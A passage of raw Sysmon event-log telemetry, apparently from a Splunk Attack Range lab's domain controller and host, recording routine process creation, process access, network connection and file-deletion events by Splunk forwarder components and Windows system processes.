09:06:54.733{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049175Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.733{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049174Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.733{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049173Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.733{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049172Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.733{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-89AE-6151-137A-00000000FC01}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049171Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.733{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89AE-6151-137A-00000000FC01}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049170Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.718{5EBD8912-89AE-6151-137A-00000000FC01}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049169Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:52.941{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53289-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001049168Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.333{5EBD8912-89AE-6151-127A-00000000FC01}3364948C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049167Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.249{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=003CD0A8E736509C3DCCCFD4E6FE9B3A,SHA256=EF867EA94BD3EB5CFB6CDB6342E43BBF51AA8520657C8DD8D92C9219094B62AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049166Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.049{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89AE-6151-127A-00000000FC01}336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049165Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.049{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049164Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.049{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049163Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.049{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049162Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.049{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049161Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.049{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-89AE-6151-127A-00000000FC01}336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049160Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.049{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89AE-6151-127A-00000000FC01}336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049159Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.034{5EBD8912-89AE-6151-127A-00000000FC01}336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977821Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:52.621{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50122-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977820Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:55.458{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A07502D580DE3C66A517EC8CD79C6DBC,SHA256=F8CE690DC47D325DD43D338CB1BC0F9361F57474C29BEE95C1EB61BC9032A83A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049189Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.403{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89AF-6151-147A-00000000FC01}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049188Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.403{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049187Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.403{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049186Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.403{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049185Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.403{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049184Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.403{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-89AF-6151-147A-00000000FC01}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049183Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.403{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89AF-6151-147A-00000000FC01}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049182Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.389{5EBD8912-89AF-6151-147A-00000000FC01}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049181Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.250{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CD2F76BBE8ED72BD01C3D7979E97397,SHA256=D3FA41865AF5AF7B8FF6EDF6CD8CEDE7CE4D94B6DAF1E0104431AC150EAB2892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977819Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:55.364{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A766A06C68E1E4E9D51AC8B0C938627,SHA256=907B57ED24FCC75870AE6F173B86697AC5837B9274A5A9A5BD152AD9C479DE3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049180Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.048{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5DEF107CFC3FD6A55C090A32DF2ED61E,SHA256=1C2FB37E49CB0673C2E1F0E6B624C263465D13B7F1642DE03D0329DB9F3A9A5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049179Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:55.048{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 